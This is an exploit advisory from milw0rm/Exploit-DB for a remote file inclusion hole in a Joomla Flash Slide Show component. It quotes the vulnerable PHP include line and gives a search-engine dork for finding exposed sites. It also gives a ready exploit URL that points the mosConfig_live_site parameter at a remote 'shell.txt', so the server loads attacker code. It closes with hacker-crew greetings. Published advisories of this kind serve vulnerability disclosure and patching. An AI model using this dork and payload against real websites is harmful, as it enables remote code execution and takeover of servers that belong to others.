Joomla! Component com_slideshow - Remote File Inclusion

EDB-ID:

4440




Platform:

PHP

Date:

2007-09-21


--==+=================== Electronic Security Team (www.Yee7.com) ====================+==--
--==+         Joomla Component Flash Slide Show (admin.slideshow1.php) - RFI         +==--
--==+================================================================================+==--

Script Name:  Joomla Component Flash Slide Show Image Gallery
exploit:      Remote File Inclusion [High Risk]
Author:       ShockShadow - Electronic Security Team (www.Yee7.com)
Home:         www.Yee7.com
Download:     http://www.joomlahacks.com/component/option,com_remository/Itemid,41/func,download/id,491/chk,cb182dd5ecd024f36f7a8fa98dd8935e/
             http://www.box.net/shared/6xeh4doczd
Search Key:   inurl:/com_slideshow/

##############################

Line 3 of admin.slideshow1.php
>    include( "$mosConfig_live_site/components/com_slideshow1/about.html" );
==============

eXploit: http://domain.com/Joomla_Path/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://shell.txt

###############################
by: ShockShadow
GrEEtZ t0:
Mr.HaCkEr, Mr-m07, Al-Shikh, ThE WhitE WolF, HuRrIcAnE, S0m.Ph, KEENEST, HamzaBX1, Alakrb Almoftres, Falcon Hammdan, RoMaNcYxHaCkEr
Medo Hacker, rUn-vIrUs, Dr.eXe, zAx
AND ALL FRIENDS

# milw0rm.com [2007-09-21]